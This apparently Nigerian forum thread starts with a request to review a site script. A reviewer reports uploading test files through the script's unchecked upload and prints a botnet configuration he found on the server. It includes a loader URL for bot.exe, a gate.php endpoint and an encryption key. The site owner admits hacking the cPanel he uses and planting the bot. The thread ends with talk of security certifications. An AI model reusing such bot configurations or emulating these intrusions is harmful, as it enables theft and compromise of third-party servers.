If you need this script contact me it a lovely one with registration , login , Ajax uploading with many features !!!!

Contact me 08100450789

http://web.zlassociates.com

Thanks

I need comment and criticism grin grin

How about a little 'about site' option on your site.

How do I know what the site is about if I'm on your homepage

No problem , i will add that

http://web.zlassociates.com/hacked_by_slyr0x.txt
http://zlassociates.com/includes/hacked_by_slyr0x.txt

^^^
(1)You need to validate user inputs i.e. what goes into the server
(2) I was crawling through your server and discovered your site serves as a Bot Host . .Ionno if you are aware of this. .If you aren't, check the [img] directory in your root folder. .

Below is a snippet of the bot's config

;Build time: 22:38:59 11.03.2011 GMT
;Version: 2.0.8.9

entry "StaticConfig"
;botnet "btn1"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "http://zlassociates.com/xxxxx/config.bin"
remove_certs 1
disable_tcpserver 0
encryption_key "asasasa!@#ASAd"
end

entry "DynamicConfig"
url_loader "http://zlassociates.com/xxxxx/bot.exe"
url_server "http://zlassociates.com/xxxxx/gate.php"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"http://advdomain/cfg.bin"
end

i know thanks .. am d one that put the bot for something .... + why will you put that rubbish txt if u can hack why nt u go to facebook or twitter !!!

It rubbish owk?? + that is not myserver i hacked that cpanel owk so dnt feel !!!!! BIG

i didnt ask for server flaws mr man !!!! + that website is just a day website .... just started yesterday so dnt feel too big !!!
u re even making me mad !!! it rubbish

^^^

Young man. .Calm your nerves!

You asked for reviews/comments/criticisms; the entry point for me wasn't the at the server level, but at the web application level.

Your scripts allow malicious users to upload just ANY files - be it .exe, .gif, .jpg, .txt, .png, .msi, . . .

The .txt file I uploaded was just a P.O.C. (Proof Of Concept) and nothing else. .2 clicks and you'll delete them. .

Next time, you shouldn't request for a review on a public forum if you've got a bloated ego.

Cheers.

@OP, you said the server is not yours and that you actually hacked the cpanel. Now, why are you mad at Slyr0x when you have dirty hands?

@Slyr0x, by the way, i will be through with CEH by next month. I will try to hack your website.

Graphics plus i see that you are mad + this ur stupidness never leave u cause u dey india watin concern person .... my brother dey go india like oke aje market + watin u dey do wey dey make ur head swell abi something dey ur head !! if u cant talk well go kiss ma ass + if u dey hate take a map and drive straight to hell !!!!

slyrox na u take the matter high jaree !! sorry 4 dat u be my person !!!

GraphicsPlus: @Slyr0x, by the way, i will be through with CEH by next month. I will try to hack your website.

Hahahaha. .CEH? Of all courses? You should do OSCP, GIAC GWAPT or eCPPT and get your hands real dirty. .CEH is a waste of time, money, resource, energy, etc. .

About hacking my website, feel free. . . .One thing I've realised over time is this: Any website can get hacked. .Be it google, yahoo, gmail, facebook, hotmail, microsoft, paypal, etc. .

If my site gets hacked today, I'll do a root-cause-analysis, find the entry points, try to fix them and re-upload. .Life goes on after that. .

@Slyr0x, what are u telling me? Thank God I never pay. You know I dont want to specifically specialize on hacking, but I will really will like to know about it very well. Not for commercial purposes, but for personal use. I will be owning some web applications that will demand high profile security and encryption. I think i will have to reconsider CEH and make more research on which one to do.

Here is the course content:

Module 01: Ethical Hacking – An Introduction

Module 02: Footprinting and Reconnaissance

Module 03: Scanning Networks

Module 04: Enumeration

Module 05: System Hacking

Module 06: Trojans and Backdoors

Module 07: Viruses and Worms

Module 08: Sniffers

Module 09: Social Engineering

Module 10: Denial of Service

Module 11: Session Hijacking

Module 12: Hacking Webservers

Module 13: Hacking Web Applications

Module 14: SQL Injection

Module 15: Hacking Wireless Networks

Module 16: Hacking Mobile Platforms

Module 17: Evading IDS, Firewalls, and Honeypots

Module 18: Buffer Overflow

Module 19: Cryptography

Module 20: Penetration Testing

^^^ I know what I'm saying bro. .I did CEH some years back. .

CEH focus more on theoretical methodologies as against the needed hands on training leaving the students with little or no technical abilities.

Like I mentioned earlier, you should either go for eLearnsecurity's Web Application Penetration Testing or GIAC Web Application Penetration Tester (GWAPT)

GraphicsPlus: @Slyr0x, by the way, i will be through with CEH by next month. I will try to hack your website.

If anyone can hack slyr0x's site, I'll call it quits with www wahala
and go back to my first love- selling pure water at night vigils